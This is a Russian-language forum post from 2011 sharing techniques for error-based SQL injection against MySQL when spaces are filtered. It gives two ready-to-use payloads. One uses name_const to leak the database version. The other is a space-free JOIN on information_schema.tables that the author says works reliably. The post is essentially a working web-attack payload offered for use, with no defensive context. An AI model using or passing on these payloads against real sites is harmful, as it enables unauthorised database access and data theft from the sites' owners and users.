Показать сообщение отдельно
Старый 02.10.2011, 18:58   #12
v1d0q
 
Аватар для v1d0q
 
Регистрация: 09.07.2010
Сообщений: 91
Репутация: 85
По умолчанию

Когда нужно вывести информацию через error based sqli, без пробелов. Первый вариант который приходит это

Код:
'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1/
Но этот вариант работает не всегда, почему? Я уже когда-то писал, нету времени искать.

Рабочий вариант который должен работать всегда был придуман примерно год назад, но о котором почему-то никто не написал.
BlackFun предложил использовать `` в name_const (за что ему большое спасибо), а я в свою очередь впихнуть в свой запрос, в котором мне так сильно были нужны кавычки для чтобы заставить "его" работать. (Заметка: в браузера работать не будет)

Код HTML:
1'and(1)=(select*from(select*from(information_schema.tables`a`)JOIN(information_schema.tables`b`)using(TABLE_CATALOG,TABLE_SCHEMA))c)='1
v1d0q вне форума   Ответить с цитированием